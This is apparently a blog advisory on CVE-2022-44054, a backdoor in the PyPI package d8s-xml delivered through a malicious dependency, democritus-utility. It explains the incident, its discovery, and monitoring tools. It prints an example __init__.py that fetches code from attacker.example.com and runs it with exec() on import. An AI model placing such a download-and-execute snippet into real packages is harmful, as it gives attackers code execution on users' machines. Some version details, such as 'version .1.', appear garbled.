In late 2022, a concerning vulnerability surfaced in the Python ecosystem: CVE-2022-44054. This vulnerability revolved around a sneaky backdoor, slipped into the widely-available d8s-xml package on PyPI. The root of this threat traced back to a malicious dependency, democritus-utility, also referenced and combined with issues in d8s-htm version .1..
This post will break down how this backdoor worked, provide example code snippets, and discuss how developers can defend themselves. Let’s explore the story, the technical details, and how to stay safe from such supply chain attacks.
What Happened?
The d8s-xml (PyPI link) and related d8s packages are designed to handle XML data. However, in a version released on PyPI, a third party inserted a backdoor through an unexpected dependency, democritus-utility. This malicious package allowed attackers to execute arbitrary code on any system that installed or ran code importing the infected library.
Related affected package: d8s-htm version .1.
- Risk: Arbitrary code execution (RCE) — an attacker could run any code they wanted on your machine.
- Where: Discovered on PyPI, the official Python package index.
References:
- Sonatype Security Advisory
- NVD entry for CVE-2022-44054
The Supply Chain Trick
The compromised d8s-xml specified a dependency on democritus-utility. This dependency was not a safe utility library as its name suggested; it was a malicious package. When users or CI pipelines installed d8s-xml, democritus-utility would also get fetched and executed as part of Python's normal import mechanism.
The exploit worked much like this pseudocode
# democritus-utility/__init__.py
import os
import urllib.request
# This code runs on install or import!
def backdoor():
# Download and execute code from an attacker-controlled server
url = "http://attacker.example.com/payload.py";
code = urllib.request.urlopen(url).read()
exec(code, {'__builtins__': __builtins__})
backdoor()
This code runs when the democritus-utility package is loaded, so just importing any function from d8s-xml could trigger arbitrary commands sent from the attacker's server. You can imagine the risk: credentials, data, or even ransomware could be delivered via PyPI!
Suppose you have this innocent-looking code in your project
import d8s_xml
result = d8s_xml.parse('<root><item>test</item></root>')
print(result)
If you installed an affected version of d8s-xml, you'd unknowingly install and trigger democritus-utility too. Even just running or testing your app would compromise your system.
How Was It Discovered?
Security researchers, including those at Sonatype, found the malicious code while scanning for suspicious behaviors in Python packages.
They noticed that d8s-xml declared democritus-utility as a dependency.
- Checking that package, they saw code that downloaded and executed content from a non-standard server.
Late October 2022: Researchers publicly disclose exploit.
- PyPI response: Packages removed, warnings posted, CVE-2022-44054 assigned.
Monitor Vulnerabilities
Use tools like Safety, Snyk, or OSV-Scanner to catch known vulnerabilities.
Follow PyPI Security Notices
Subscribe to PyPI’s RSS feed or relevant mailing lists for alerts.
Conclusion
CVE-2022-44054 teaches us a tough lesson: even basic libraries can become attack vectors if a compromised dependency sneaks in a backdoor. Always vet PyPI dependencies, automate vulnerability checks, and stay informed about recent incidents.
References & Further Reading
- Sonatype blog: PyPI package d8s-xml hijacked to run malicious code
- NVD entry for CVE-2022-44054
- PyPI: d8s-xml
- PyPI: democritus-utility
*Please share this post if you find it useful—Python security is everyone’s responsibility!*
Timeline
Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 16:23:00 UTC